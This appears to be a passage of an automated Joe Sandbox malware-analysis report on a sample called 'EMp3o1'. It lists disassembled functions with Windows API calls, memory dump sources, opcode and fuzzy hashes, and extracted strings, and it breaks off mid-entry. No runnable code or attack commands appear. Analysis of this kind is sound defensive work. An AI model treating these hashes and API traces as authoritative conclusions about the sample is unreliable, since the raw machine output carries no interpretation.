                                                • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                APIs
                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 319667368-0
                                                • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                APIs
                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                  • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                • String ID:
                                                • API String ID: 1390108997-0
                                                • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 3523768491-393685449
                                                • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                • Instruction ID: 8472557886d6eeb6ee8208f22d64b3934028815341dc96c2cf46a9fc311ba589
                                                • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                • Instruction Fuzzy Hash: A9E19132A097828AEB309F78D4603AD77A0FB457A8F158135DA8D57797CF38E4A1D708
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC0895CB
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC089601
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC08962E
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC08963F
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC089650
                                                • SetLastError.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC08966B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value$ErrorLast
                                                • String ID:
                                                • API String ID: 2506987500-0
                                                • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                • Instruction ID: 6f20fcceddb47c257b385d19bff2111c6c0186bb51a245ba5e9f9cdf7640955f
                                                • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                • Instruction Fuzzy Hash: C8113820B0F64246FA647321597127931969F84BF0F448735E92E06BDBDF2CE471A70C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                • String ID:
                                                • API String ID: 3326452711-0
                                                • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                • API String ID: 2984211723-1229430080
                                                • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                • Instruction ID: 861f30f6e18e9e41b2c068874627be075b5c45f2111c6147ffe9eed4c0536d53
                                                • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                • Instruction Fuzzy Hash: FBF06261B1B60285EB208B29E4653396720AF887F1F540335DA6D463FACF3CD469E74C
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                • ExitProcess.KERNEL32 ref: 0000000140008545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressExitHandleModuleProcProcess
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 75539706-1276376045
                                                • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                • Instruction ID: a7dfda48d7a832d2e6d36119519b2cbac14c07a9a0431d00c032da6129f4bb55
                                                • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                • Instruction Fuzzy Hash: 6FB18A22B0F68281EA75CAA594706397790AF54BE4F49C835DB4C0778BDF2CE462A30C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: FileInfoSleepStartupType
                                                • String ID:
                                                • API String ID: 1527402494-0
                                                • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                • String ID:
                                                • API String ID: 3078728599-0
                                                • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 1850339568-0
                                                • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                • Instruction ID: 6fe893a8b7f7f69ddf03af39da29d068740fb628badfa901e448138ed8e0ecbb
                                                • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                • Instruction Fuzzy Hash: 0A115E72F1EA5B01F6A41178E57637920516F9C7F4F148634E5AE063DB8F2CE8606B0D
                                                APIs
                                                • FlsGetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896A3
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896C2
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896EA
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896FB
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC08970C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                • Instruction ID: 4401f45b63c78aefb4722a90d2d25a6d33f12cffe706c08c085d515959c7593d
                                                • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                • Instruction Fuzzy Hash: 57116D20B0F24245FA687725697117931915F44BF0F588335E86E067CBEF2CE461A70C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                • Instruction ID: 6bf9051f1b020aed11ca7476cc668a982bce46db50200ac0ca0353189d363966
                                                • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                • Instruction Fuzzy Hash: 3E11B050B4F2065AFA78B661587227932914F84BF0E588735D92E0A7D3EF2CF461A70C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                • Instruction ID: 76cf5ec1040fd5762469fa946a1a0914adf410a27ccff2c2dd52c772ed7ab070
                                                • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                • Instruction Fuzzy Hash: 27919373B09B818AEB20CF64E4602AD7BA0F7447D8F14813AEA4D57756DF38D1A5DB08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 2395640692-1018135373
                                                • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                • Instruction ID: 70a89f2b906ee3799f0ca52db6b30d344498930ccae12a26931a1f6c461d0b5f
                                                • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                • Instruction Fuzzy Hash: 1851B331B1A6428ADB248F19D464A7D7791EB84BE8F10C131DA4A43746DF7DE861DB0C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                • Instruction ID: 567c2e89890ac2ef4be90e7906f7b0fae13703eb2c86d426548b49e4da6d7358
                                                • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                • Instruction Fuzzy Hash: F3619432A09BC585EB718F15E4503A9B7A0FB857E4F048225EB9C47B96CF7CD1A0DB08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 3896166516-3733052814
                                                • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                • Instruction ID: 4494ebb3a1b1570791fcebc11305ed7827615b9580a0ec3c8227152fdbc8ab40
                                                • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                • Instruction Fuzzy Hash: 0C517E32B0A3828AEF748F1594A426876A1EB64BE4F14C135DA5D87786CF3CE461DB0D
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
